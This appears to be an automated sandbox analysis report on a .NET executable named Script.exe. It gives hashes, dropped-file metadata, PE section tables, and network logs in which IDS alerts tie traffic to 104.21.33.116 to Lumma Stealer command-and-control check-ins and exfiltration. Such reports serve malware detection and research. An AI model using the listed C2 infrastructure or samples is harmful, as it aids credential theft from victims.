                                                                                  SHA1:E7964D0A60F8CBD71F8F7126EB4DDED5C322AD55
                                                                                  SHA-256:53336A96B7AD862957A5076DF12779DAE3D24660CBF8F245D4B0B5E1D45D2C43
                                                                                  SHA-512:B3BE91C2C0EF96F8B42855A2BF0BB5F263B8530C62DDE93F7730F7949931BEC56BB239ADD04D7C616F978175A67AA6424343E42D236942B999E5E31345CE98AF
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:MDMP..a..... ........9Ag............t.......................$...8............M..........`.......8...........T...........00..D...........\...........H ..............................................................................eJ....... ......GenuineIntel............T............9Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8406
                                                                                  Entropy (8bit):3.706284442240866
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:R6l7wVeJCi6uC7L6YEI5SU9ehgmfZiYeipr089bjLsfZtBm:R6lXJ36d6YEGSU9ehgmf4Ye2jQfZC
                                                                                  MD5:1D787978B1DAA13AA5115C8C6F0AD9DD
                                                                                  SHA1:338D9E558BC82982EF7C7ABF8708417D77B91F8F
                                                                                  SHA-256:72CF3D42D8AF0E1C39105C3D89A41D7B0090145DE4D6B9FA1BE504063D7C6AEC
                                                                                  SHA-512:0A01968230E9571448FBD2216BA86B59CAF5198063D8154A6D525620EA35FFCEE818790F262B4211250D5238D0D64CADA94AF3CA9C7CBBE398510B7B785DBE75
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.0.<./.P.i.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4769
                                                                                  Entropy (8bit):4.513182933973075
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zs+Jg77aI9rwWpW8VYIsYm8M4Jq0S2Fx+q8vKSiyNEMX0DwMb4d:uIjf0I7lJ7VjpJFKIRMELUd
                                                                                  MD5:EC4199AA14BC64E7A2D50E4FE35FC4BF
                                                                                  SHA1:08B24AFCBD9FE5DF1B425028CDB5424D573009DF
                                                                                  SHA-256:D38E54A7DCB00FF8D84C0D90D26E0FBB09667DBB6E34A7D0DFE3FD9A39BD69BB
                                                                                  SHA-512:39A0A197C37C69B639B0906DD4E087431C86CC3EDBC497E301EAF7D694E522E98C31DA94A37BC485C651C191593BCD3AB543B325D93F53C43D6D6FFC7E5A3605
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600073" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                  Process:C:\Users\user\Desktop\Script.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):455168
                                                                                  Entropy (8bit):7.10849276789882
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:YeFpDFrrXILt+I2V75hGT29Ud9qtOzY3bkNe+gfg5uH6dBVCybrP/F4fhd3L0iWw:5HFrrXILt+I2V75hGT29Ud9qtOzYrkNZ
                                                                                  MD5:91A02180EC73E9ABBC6AA4147E064290
                                                                                  SHA1:8228CBAFC40B69D6F25F251A8CE3F79A6E44262C
                                                                                  SHA-256:DE595E16010E0DFA94562AD992402B1D80E97B23A041F8E7C9D9EE562BF9DDFB
                                                                                  SHA-512:03B865E3E9F50BC7F880D03BC04921BB58250A1772BC3BE406EE13BA538857ECF3FE904CE753562DD22F4AA00CD2C3A56C873AE2CE5D063F4F372B7262E40EE8
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....Ag...........!.........V...............................................0............@.............................|.......P...............................(...\...............................x...@...............T............................text...8........................... ..`.rdata...\.......^..................@..@.data........ ......................@....reloc..(...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):1835008
                                                                                  Entropy (8bit):4.422052187708564
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:aSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTw:JvloTMW+EZMM6DFyO03w
                                                                                  MD5:81D5A44CA15A9E9D5B9C99651F0E3C9D
                                                                                  SHA1:3E496309FA200DEEBE6703D7B00574AE574C50A9
                                                                                  SHA-256:225BA12C2E0435D1F49E85EBFA2B850DD631B28F0E8F18A1D46D15CD1C44DC68
                                                                                  SHA-512:E983F094365F3A9735BC3708C0AF779490D9897F74A2BCAB5DD20062A8E606066DEAA0B308B1DA7D07D9BCDD7D8691FB60DB5FDBD48138A04FF5C63C20138B5B
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmb...L=..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\Script.exe
                                                                                  File Type:ASCII text, with very long lines (357), with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1417
                                                                                  Entropy (8bit):4.538576953964489
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:7v74Nui2MvXIUn2p/kpgw4r22Drrb2nknl1sDp:7T4l2Mff2p8p14nrPKkkp
                                                                                  MD5:1B67286EBD118AD70110B651210A5B6B
                                                                                  SHA1:5020EA152CF7F31F986AA25CC17D9AD2B1340336
                                                                                  SHA-256:7742760E8562AF1671C72E7C2842DBBF8EFC824D2D2102DDE248784F3843BA7B
                                                                                  SHA-512:54F7526FACF42F40F1D355C515D648105529478DFC0E981BB7049FB4EAE0631D521D4708237C1A9D24D481405880C97E6CD0C7E228C1D525E97B9996528C6CD1
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "NathanEleanorBenjamin" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.Ge
                                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.760343533212073
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:Script.exe
                                                                                  File size:709'632 bytes
                                                                                  MD5:e9c36f6a03694c88081409d38d76b9e8
                                                                                  SHA1:59356b5d0918fd2c402ebfff702846100d02a7f1
                                                                                  SHA256:980a90b7a738a090f4775800a3de183f2e9d94ce54f882e443c2d01105badb4d
                                                                                  SHA512:2b1bca06924d55760a008b3ad4e53bbbecc710b508d514a7ee082fea45efb1b842f1a4c8767458f9a9a4bc185a83616d5c66e7f7ae882bda5f117e7b13c3c123
                                                                                  SSDEEP:12288:wxxd/NdjsFXJbzpaQPeNvddW7n/hXDOoqn+eJ3XbaiUFgQKPp0YkEN1PhdWLxX7c:wxv/NBsFaQ4bqZpunbaN2Q
                                                                                  TLSH:D5E48CDC725072EFC867C472DEA81CA4FA9174BB931F4257A02706AD9A5D88BCF150F2
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag..............0..............@....... ....@.. .......................`............@................................
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x4b400a
                                                                                  Entrypoint Section:
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows cui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x67410903 [Fri Nov 22 22:43:15 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [004B4000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x908340x57.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x660.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xb40000x8
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x900000x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  )UHMIO0x20000x8d1640x8d2007c765714ec3a5fb6d7928d9c33ccb891False1.0003217725863596data7.999726379594664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .text0x900000x1f0d80x1f2000974b9de426dcb75372d674426c10a2bFalse0.3306821034136546data4.70688184769072IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xb00000x6600x800746fb3f53e0611fda732cac11882e9e1False0.35302734375data3.587933527710975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0xb20000xc0x20049ba7a9e1e9d0fde8dd025f5fdb99dfeFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  0xb40000x100x200d3fdef20fd434b97e14e5bcf76b9abbfFalse0.044921875Applesoft BASIC program data, first line number 90.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_VERSION0xb00a00x3d4data0.42551020408163265
                                                                                  RT_MANIFEST0xb04740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-23T03:11:08.080599+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.33.116443TCP
                                                                                  2024-11-23T03:11:08.987788+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.33.116443TCP
                                                                                  2024-11-23T03:11:08.987788+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.33.116443TCP
                                                                                  2024-11-23T03:11:10.417761+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.33.116443TCP
                                                                                  2024-11-23T03:11:11.170907+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706104.21.33.116443TCP
                                                                                  2024-11-23T03:11:11.170907+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.33.116443TCP
                                                                                  2024-11-23T03:11:12.715388+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.33.116443TCP
                                                                                  2024-11-23T03:11:14.940552+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712104.21.33.116443TCP
                                                                                  2024-11-23T03:11:17.297654+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714104.21.33.116443TCP
                                                                                  2024-11-23T03:11:19.787711+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549717104.21.33.116443TCP
                                                                                  2024-11-23T03:11:20.533321+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549717104.21.33.116443TCP
                                                                                  2024-11-23T03:11:22.208787+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549718104.21.33.116443TCP
                                                                                  2024-11-23T03:11:26.257251+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549732104.21.33.116443TCP
                                                                                  2024-11-23T03:11:26.990618+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549732104.21.33.116443TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 23, 2024 03:11:06.812257051 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:06.812294960 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:06.812664032 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:06.814203978 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:06.814230919 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:08.080513954 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:08.080599070 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:08.154491901 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:08.154541969 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:08.154869080 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:08.196454048 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:08.244086027 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:08.244123936 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:08.244208097 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:08.987796068 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:08.987905979 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:08.987957001 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:08.990395069 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:08.990412951 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:08.990431070 CET49704443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:08.990437984 CET44349704104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:09.110794067 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:09.110869884 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:09.110959053 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:09.111448050 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:09.111485004 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:10.417644978 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:10.417761087 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:10.419154882 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:10.419164896 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:10.419540882 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:10.421128035 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:10.421169996 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:10.421217918 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.170907974 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.170950890 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.170978069 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.171000957 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.171006918 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.171017885 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.171046972 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.171063900 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.171103001 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.171113014 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.187464952 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.187524080 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.187534094 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.195856094 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.195935965 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.195945978 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.243341923 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.290221930 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.337085009 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.381196022 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.385087967 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.385140896 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.385153055 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.385179996 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.385224104 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.385339975 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.385350943 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.385365963 CET49706443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.385371923 CET44349706104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.501441956 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.501488924 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:11.501566887 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.502026081 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:11.502042055 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:12.715249062 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:12.715388060 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:12.717031002 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:12.717067003 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:12.717314005 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:12.724642038 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:12.724786997 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:12.724833012 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:13.503556967 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:13.503662109 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:13.503734112 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:13.503916025 CET49708443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:13.503961086 CET44349708104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:13.635437012 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:13.635509968 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:13.635602951 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:13.636003971 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:13.636024952 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:14.940458059 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:14.940551996 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:14.941631079 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:14.941634893 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:14.941862106 CET44349712104.21.33.116192.168.2.5
                                                                                  Nov 23, 2024 03:11:14.943048954 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:14.943175077 CET49712443192.168.2.5104.21.33.116
                                                                                  Nov 23, 2024 03:11:14.943206072 CET44349712104.21.33.116192.168.2.5
